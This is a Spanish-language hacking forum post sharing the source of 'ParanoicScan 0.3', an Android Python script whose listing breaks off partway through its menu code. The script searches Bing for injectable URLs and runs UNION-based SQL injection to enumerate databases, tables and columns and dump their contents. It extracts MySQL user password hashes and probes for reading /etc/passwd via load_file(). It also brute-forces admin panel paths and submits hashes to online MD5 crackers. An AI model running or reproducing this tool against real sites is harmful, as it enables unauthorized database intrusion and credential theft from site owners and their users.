send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Python-Android] ParanoicScan 0.3

  • 1 Respuestas
  • 1294 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Febrero 03, 2014, 10:17:40 am »
Un simple script en python para android , el cual lo uso en mi tablet , el script tiene las siguientes funciones :

  • Scannea en bing buscando SQLI
  • Un completo scanner SQLI
  • Buscador de panel de administracion
  • Codificador de MD5
  • Codificador y Decodificador de Base64 y Hex
  • Localizador de IP y sus DNS
  • Crackeador de para hashes MD5
  • HTTP FingerPrinting


Unas imagenes :























El codigo :

Código: Python
  1. #!usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. #################################################################################
  4. #This software is Copyright (c) 2014 by Doddy Hackman.
  5. #
  6. #This is free software, licensed under:
  7. #
  8. #  The Artistic License 1.0
  9. #
  10. #The Artistic License
  11. #
  12. #Preamble
  13. #
  14. #The intent of this document is to state the conditions under which a Package
  15. #may be copied, such that the Copyright Holder maintains some semblance of
  16. #artistic control over the development of the package, while giving the users of
  17. #the package the right to use and distribute the Package in a more-or-less
  18. #customary fashion, plus the right to make reasonable modifications.
  19. #
  20. #Definitions:
  21. #
  22. #  - "Package" refers to the collection of files distributed by the Copyright
  23. #    Holder, and derivatives of that collection of files created through
  24. #    textual modification.
  25. #  - "Standard Version" refers to such a Package if it has not been modified,
  26. #    or has been modified in accordance with the wishes of the Copyright
  27. #    Holder.
  28. #  - "Copyright Holder" is whoever is named in the copyright or copyrights for
  29. #    the package.
  30. #  - "You" is you, if you're thinking about copying or distributing this Package.
  31. #  - "Reasonable copying fee" is whatever you can justify on the basis of media
  32. #    cost, duplication charges, time of people involved, and so on. (You will
  33. #    not be required to justify it to the Copyright Holder, but only to the
  34. #    computing community at large as a market that must bear the fee.)
  35. #  - "Freely Available" means that no fee is charged for the item itself, though
  36. #    there may be fees involved in handling the item. It also means that
  37. #    recipients of the item may redistribute it under the same conditions they
  38. #    received it.
  39. #
  40. #1. You may make and give away verbatim copies of the source form of the
  41. #Standard Version of this Package without restriction, provided that you
  42. #duplicate all of the original copyright notices and associated disclaimers.
  43. #
  44. #2. You may apply bug fixes, portability fixes and other modifications derived
  45. #from the Public Domain or from the Copyright Holder. A Package modified in such
  46. #a way shall still be considered the Standard Version.
  47. #
  48. #3. You may otherwise modify your copy of this Package in any way, provided that
  49. #you insert a prominent notice in each changed file stating how and when you
  50. #changed that file, and provided that you do at least ONE of the following:
  51. #
  52. #  a) place your modifications in the Public Domain or otherwise make them
  53. #     Freely Available, such as by posting said modifications to Usenet or an
  54. #     equivalent medium, or placing the modifications on a major archive site
  55. #     such as ftp.uu.net, or by allowing the Copyright Holder to include your
  56. #     modifications in the Standard Version of the Package.
  57. #
  58. #  b) use the modified Package only within your corporation or organization.
  59. #
  60. #  c) rename any non-standard executables so the names do not conflict with
  61. #     standard executables, which must also be provided, and provide a separate
  62. #     manual page for each non-standard executable that clearly documents how it
  63. #     differs from the Standard Version.
  64. #
  65. #  d) make other distribution arrangements with the Copyright Holder.
  66. #
  67. #4. You may distribute the programs of this Package in object code or executable
  68. #form, provided that you do at least ONE of the following:
  69. #
  70. #  a) distribute a Standard Version of the executables and library files,
  71. #     together with instructions (in the manual page or equivalent) on where to
  72. #     get the Standard Version.
  73. #
  74. #  b) accompany the distribution with the machine-readable source of the Package
  75. #     with your modifications.
  76. #
  77. #  c) accompany any non-standard executables with their corresponding Standard
  78. #     Version executables, giving the non-standard executables non-standard
  79. #     names, and clearly documenting the differences in manual pages (or
  80. #     equivalent), together with instructions on where to get the Standard
  81. #     Version.
  82. #
  83. #  d) make other distribution arrangements with the Copyright Holder.
  84. #
  85. #5. You may charge a reasonable copying fee for any distribution of this
  86. #Package.  You may charge any fee you choose for support of this Package. You
  87. #may not charge a fee for this Package itself. However, you may distribute this
  88. #Package in aggregate with other (possibly commercial) programs as part of a
  89. #larger (possibly commercial) software distribution provided that you do not
  90. #advertise this Package as a product of your own.
  91. #
  92. #6. The scripts and library files supplied as input to or produced as output
  93. #from the programs of this Package do not automatically fall under the copyright
  94. #of this Package, but belong to whomever generated them, and may be sold
  95. #commercially, and may be aggregated with this Package.
  96. #
  97. #7. C or perl subroutines supplied by you and linked into this Package shall not
  98. #be considered part of this Package.
  99. #
  100. #8. The name of the Copyright Holder may not be used to endorse or promote
  101. #products derived from this software without specific prior written permission.
  102. #
  103. #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
  104. #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
  105. #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
  106. #
  107. #The End
  108. #
  109. #################################################################################
  110. #Paranoic Scan 0.3
  111. #Android Version
  112. #(C) Doddy Hackman 2014
  113. #################################################################################
  114.  
  115. import android,urllib2,socket,binascii,re,base64,hashlib
  116.  
  117. webvul = ""
  118.  
  119. # Functions
  120.  
  121. def hexencoder(texto):
  122.  return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
  123.  
  124. def hexdecoder(texto):
  125.  text = re.sub("0x","",texto)
  126.  return "[+] Result : "+binascii.unhexlify(text)
  127.  
  128. def base64encoder(texto):
  129.  return "[+] Result : "+base64.b64encode(texto)
  130.  
  131. def base64decoder(texto):
  132.  return "[+] Result : "+base64.b64decode(texto)
  133.  
  134. def md5encoder(texto):
  135.  return "[+] Result : "+hashlib.md5(texto).hexdigest()
  136.  
  137. def reem(texto,parte):
  138.  return re.sub(parte,"hackman",texto)
  139.  
  140. def regexver(code):
  141.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  142.   return True
  143.  else:
  144.   return False
  145.  
  146. def regexdar(code):
  147.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  148.   return re.findall("K0BRA(.*?)K0BRA",code)[0]
  149.  
  150. def toma(web) :
  151.  nave = urllib2.Request(web)
  152.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  153.  op = urllib2.build_opener()
  154.  return op.open(nave).read()
  155.  
  156. def tomar(web,vars) :
  157.  nave = urllib2.build_opener()
  158.  nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  159.  return nave.open(web,vars).read()
  160.  
  161. def getdata(web) :
  162.  nave = urllib2.Request(web)
  163.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  164.  op = urllib2.build_opener()
  165.  return op.open(nave).info()
  166.  
  167. def bypass(bypass):
  168.  if bypass == "--":
  169.   return("+","--")
  170.  elif bypass == "/*":
  171.   return("/**/","/**/")
  172.  else:
  173.   return("+","--")
  174.  
  175. def showtables(web):
  176.  pass1,pass2 = bypass("--")
  177.  respuesta = ""
  178.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  179.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  180.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  181.  respuesta = respuesta + "[+] Searching tables ...\n\n"
  182.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  183.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  184.   numbers = numbers[0]
  185.   respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n" 
  186.   for counter in range(17,int(numbers)):
  187.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  188.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  189.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  190.     table = table[0]
  191.     respuesta = respuesta + "[Table Found] : "+table+"\n"
  192.  else:
  193.   respuesta = respuesta + "[-] Not Found\n"
  194.  respuesta = respuesta + "\n[+] Finished"
  195.  return respuesta
  196.  
  197. def showcolumns(web,tabla):
  198.  respuesta = ""
  199.  pass1,pass2 = bypass("--")
  200.  tabla2 = tabla
  201.  tabla = "0x"+str(binascii.hexlify(tabla))
  202.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  203.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  204.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  205.  respuesta = respuesta + "[+] Searching columns ...\n\n"
  206.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  207.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  208.   numbers = numbers[0]
  209.   respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"  
  210.   for counter in range(0,int(numbers)):
  211.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  212.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  213.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  214.     column = column[0]
  215.     respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
  216.  else:
  217.   respuesta = respuesta + "[-] Not Found"
  218.  respuesta = respuesta + "\n\n[+] Finished"
  219.  return respuesta
  220.  
  221. def showdbs(web):
  222.  respuesta = ""
  223.  pass1,pass2 = bypass("--")
  224.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  225.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  226.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  227.  respuesta = respuesta + "[+] Searching DBS ...\n\n"
  228.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  229.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  230.   numbers = numbers[0]
  231.   respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"      
  232.   for counter in range(0,int(numbers)):
  233.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  234.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  235.     db = re.findall("K0BRA(.*?)K0BRA",code2)
  236.     db = db[0]
  237.     respuesta = respuesta + "\n[DB Found] : "+db
  238.  else:
  239.   respuesta = respuesta + "[-] Not Found"
  240.  respuesta = respuesta + "\n\n[+] Finished"
  241.  return respuesta
  242.  
  243. def dumper(web,table,col1,col2):
  244.  respuesta = ""
  245.  pass1,pass2 = bypass("--")
  246.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  247.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  248.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  249.  respuesta = respuesta + "[+] Searching values ...\n\n"
  250.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  251.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  252.   numbers = numbers[0]
  253.   respuesta = respuesta + "[+] Values Found : "+numbers+"\n"   
  254.   for counter in range(0,int(numbers)):
  255.    code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)    
  256.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  257.     c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  258.     c1 = c1[0]
  259.     c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  260.     c2 = c2[0]
  261.     respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
  262.     respuesta = respuesta + "["+col2+"] : "+c2+"\n"
  263.  else:
  264.   respuesta = respuesta + "[-] Not Found\n"
  265.  respuesta = respuesta + "\n[+] Finished"
  266.  return respuesta
  267.  
  268. def mysqluser(web):
  269.  pass1,pass2 = bypass("--")
  270.  respuesta = ""
  271.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  272.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  273.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  274.  respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
  275.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  276.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  277.   numbers = numbers[0]
  278.   respuesta = respuesta + "[+] Users Found : "+numbers+"\n"    
  279.   for counter in range(0,int(numbers)):
  280.    code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  281.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  282.     host = re.findall("K0BRA(.*?)K0BRA",code2)
  283.     host = host[0]
  284.     user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  285.     user = user[0]
  286.     passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  287.     passw = passw[0]
  288.     respuesta = respuesta + "\n[Host] : "+host
  289.     respuesta = respuesta + "\n[User] : "+user
  290.     respuesta = respuesta + "\n[Pass] : "+passw+"\n"    
  291.  else:
  292.   respuesta = respuesta + "[-] Not Found\n"
  293.  respuesta = respuesta + "\n[+] Finished"
  294.  return respuesta
  295.  
  296. def showcolumnsdb(web,db,table):
  297.  respuesta = ""
  298.  db2 = db
  299.  table2 = table
  300.  db = "0x"+str(binascii.hexlify(db))
  301.  table = "0x"+str(binascii.hexlify(table))
  302.  pass1,pass2 = bypass("--")
  303.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  304.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  305.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) 
  306.  respuesta = respuesta + "[+] Searching columns in DB ...\n"
  307.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  308.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  309.   numbers = numbers[0]
  310.   respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"   
  311.   for counter in range(0,int(numbers)):
  312.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  313.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  314.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  315.     column = column[0]
  316.     respuesta = respuesta + "\n[Column Found] : "+str(column)
  317.  else:
  318.   respuesta = respuesta + "\n[-] Not Found"
  319.  respuesta = respuesta + "\n\n[+] Finished"
  320.  return respuesta
  321.  
  322. def showtablesdb(web,db):
  323.  respuesta = ""
  324.  db2 = db
  325.  db = "0x"+str(binascii.hexlify(db))
  326.  pass1,pass2 = bypass("--")
  327.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  328.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  329.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  330.  respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
  331.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  332.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  333.   numbers = numbers[0]
  334.   respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"      
  335.   for counter in range(0,int(numbers)):
  336.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  337.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  338.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  339.     table = table[0]
  340.     respuesta = respuesta + "\n[Table Found] : "+table
  341.  else:
  342.   respuesta = respuesta + "[-] Not Found"
  343.  respuesta = respuesta + "\n\n[+] Finished"
  344.  return respuesta
  345.  
  346. def more(web):
  347.  respuesta = ""
  348.  pass1,pass2 = bypass("--")
  349.  otraweb = web
  350.  respuesta = respuesta + "[+] Searching DB Details ...\n"
  351.  hextest = "0x2f6574632f706173737764"
  352.  web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  353.  web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  354.  code0 = toma(web1+pass2)
  355.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  356.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  357.   datar = re.split("K0BRA",datax[0])
  358.   respuesta = respuesta + "\n[+] Username : "+datar[1]
  359.   respuesta = respuesta + "\n[+] Database : "+datar[2]
  360.   respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
  361.  
  362.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  363.  if (re.findall("K0BRA",code1)):
  364.    respuesta = respuesta + "\n[+] mysql.user : on"
  365.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  366.  if (re.findall("K0BRA",code2)):
  367.    respuesta = respuesta + "\n[+] information_schema.tables : on"
  368.  codetres = toma(web2)
  369.  if (re.findall("ERTOR854",codetres)):
  370.   respuesta = respuesta + "\n[+] load_file() : on"
  371.  respuesta = respuesta + "\n\n[+] Finished"
  372.  return respuesta
  373.  
  374. def httpfinger(target):
  375.  respuesta = ""
  376.  try:
  377.   respuesta = respuesta + str(getdata(target))
  378.  except:
  379.   respuesta = respuesta + "[-] Error"
  380.  return respuesta
  381.  
  382. def scanpanel(web):
  383.  contador = 0
  384.  panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  385.  respuesta = ""
  386.  respuesta = respuesta + "[+] Scanning ...\n"
  387.  for path in panels:
  388.   try:
  389.    toma(web+"/"+path)
  390.    respuesta = respuesta + "\n[+] Link : "+web+"/"+path
  391.    contador = contador + 1
  392.   except urllib2.URLError, e:
  393.    pass
  394.  
  395.  if(contador==0) :
  396.   respuesta = respuesta + "\n[+] Not Found"
  397.  respuesta = respuesta + "\n\n[+] Finished"
  398.  return respuesta
  399.  
  400. def crackmd5(md5) :
  401.  respuesta = ""
  402.  code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  403.  if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
  404.   rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
  405.   return "[+] Hash : "+rex[0][1]
  406.  else:
  407.   code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  408.   if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
  409.    rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
  410.    return "[+] Hash : "+rex[0]
  411.   else:
  412.    code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  413.    if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
  414.     rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
  415.     return "[+] Hash : "+rex[0]
  416.    else:
  417.     return "[+] Hash : Not Found"
  418.  return respuesta
  419.  
  420. def locateip(pagina):
  421.  
  422.  respuesta = ""
  423.  
  424.  ip = socket.gethostbyname(str(pagina))
  425.  code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)
  426.  
  427.  respuesta = respuesta + "[++] IP Address Location\n"
  428.  
  429.  if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  430.   rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  431.   city = rex[0][1]
  432.   respuesta = respuesta + "\n[++] City : "+city
  433.  else:
  434.   respuesta = respuesta + "\n[++] City : Not Found"
  435.  
  436.  if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  437.   rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  438.   country = rex[0][1]
  439.   respuesta = respuesta + "\n[++] Country : "+country
  440.  else:
  441.   respuesta = respuesta + "\n[++] Country : Not Found"
  442.  
  443.  if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  444.   rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  445.   state = rex[0][1]
  446.   respuesta = respuesta + "\n[++] State : "+state
  447.  else:
  448.   respuesta = respuesta + "\n[++] State : Not Found"
  449.  
  450.  
  451.  code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  452.  
  453.  if (re.findall("whois\/(.*?)\">Whois",code)):
  454.   rex = re.findall("whois\/(.*?)\">Whois",code)
  455.   respuesta = respuesta + "\n\n[++] DNS Founds\n"
  456.   for dns in rex:
  457.    respuesta = respuesta + "\n[+] "+dns
  458.  
  459.  return respuesta
  460.  
  461. def sqltest(webs):
  462.  respuesta = ""
  463.  for web in webs :
  464.   if re.findall("=",web):
  465.    web = re.split("=",web)
  466.    web = web[0]+"="
  467.  
  468.    try:
  469.     code = toma(web+"-1+union+select+1--")
  470.     if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  471.      respuesta = respuesta + "[SQLI] : "+web+"\n"
  472.    except:
  473.     pass
  474.  return respuesta
  475.  
  476. def limpiar(pag):
  477.  
  478.  limpia = []
  479.  for p in pag:
  480.   if p not in limpia:
  481.    limpia.append(p)
  482.  return limpia
  483.  
  484. def bingscan(dork,count):
  485.  
  486.  respuesta = ""
  487.  
  488.  pag = []
  489.  s = 10  
  490.  
  491.  while s <= int(count):
  492.   try:
  493.    code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  494.    d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  495.    s += 10
  496.    for a in d:
  497.     pag.append(a)
  498.   except:
  499.    pass
  500.  
  501.  pag = limpiar(pag)
  502.  
  503.  return pag
  504.  
  505.  
  506. ##
  507.  
  508. aplicacion = android.Android()
  509.  
  510. def menuencoder():
  511.  
  512.  aplicacion.dialogCreateAlert("Encoders")
  513.  aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
  514.  aplicacion.dialogShow()
  515.  reh = aplicacion.dialogGetResponse().result
  516.  reb = reh["item"]
  517.  
  518.  if reb==0:
  519.  
  520.   aplicacion.dialogCreateAlert("MD5 Encoder")
  521.  
  522.   aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
  523.   ref = aplicacion.dialogGetResponse().result
  524.  
  525.   if not ref['which'] == 'positive' :
  526.    menuencoder()
  527.   else:
  528.    texto = ref['value']
  529.  
  530.    aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
  531.    aplicacion.dialogShow()
  532.  
  533.    don = md5encoder(texto)
  534.  
  535.    aplicacion.dialogDismiss()
  536.  
  537.    aplicacion.dialogCreateAlert("MD5 Encoder",don)
  538.    aplicacion.dialogSetPositiveButtonText("Done")
  539.    aplicacion.dialogShow()
  540.  
  541.    op = aplicacion.dialogGetResponse().result
  542.  
  543.    if op["which"] == "positive" :
  544.     menuencoder()
  545.  
  546.  
  547.  if reb==1 :
  548.  
  549.   aplicacion.dialogCreateAlert("Base64 Encoder")
  550.  
  551.   aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
  552.   ref = aplicacion.dialogGetResponse().result
  553.  
  554.   if not ref['which'] == 'positive' :
  555.    menuencoder()
  556.   else:
  557.    texto = ref['value']
  558.  
  559.    aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
  560.    aplicacion.dialogShow()
  561.  
  562.    don = base64encoder(texto)
  563.  
  564.    aplicacion.dialogDismiss()
  565.  
  566.    aplicacion.dialogCreateAlert("Base64 Encoder",don)
  567.    aplicacion.dialogSetPositiveButtonText("Done")
  568.    aplicacion.dialogShow()
  569.  
  570.    op = aplicacion.dialogGetResponse().result
  571.  
  572.    if op["which"] == "positive" :
  573.     menuencoder()
  574.  
  575.  if reb==2 :
  576.  
  577.   aplicacion.dialogCreateAlert("Base64 Decoder")
  578.  
  579.   aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
  580.   ref = aplicacion.dialogGetResponse().result
  581.  
  582.   if not ref['which'] == 'positive' :
  583.    menuencoder()
  584.   else:
  585.    texto = ref['value']
  586.  
  587.    aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
  588.    aplicacion.dialogShow()
  589.  
  590.    don = base64decoder(texto)
  591.  
  592.    aplicacion.dialogDismiss()
  593.  
  594.    aplicacion.dialogCreateAlert("Base64 Decoder",don)
  595.    aplicacion.dialogSetPositiveButtonText("Done")
  596.    aplicacion.dialogShow()
  597.  
  598.    op = aplicacion.dialogGetResponse().result
  599.  
  600.    if op["which"] == "positive" :
  601.     menuencoder()
  602.  
  603.  if reb==3 :
  604.  
  605.   aplicacion.dialogCreateAlert("Hex Encoder")
  606.  
  607.   aplicacion.dialogGetInput("Hex Encoder","Enter Text")
  608.   ref = aplicacion.dialogGetResponse().result
  609.  
